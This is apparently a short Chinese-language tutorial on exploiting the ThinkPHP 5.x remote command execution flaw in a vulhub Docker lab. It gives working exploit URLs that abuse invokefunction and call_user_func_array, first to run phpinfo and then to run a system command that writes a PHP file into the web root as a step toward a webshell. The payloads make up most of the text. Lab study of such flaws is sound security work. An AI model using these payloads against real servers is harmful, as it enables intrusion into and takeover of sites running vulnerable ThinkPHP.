常⻅框架漏洞--ThinkPHP
Thinkphp5x远程命令执⾏及getshell
环境搭建
cd vulhub/thinkphp/5-rce
docker-compose up -d #启动环境
访问网址
漏洞利⽤
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php
根⽬录⽣成1.php ⽂件,输出phpinfo
另一种方法,直接工具操作
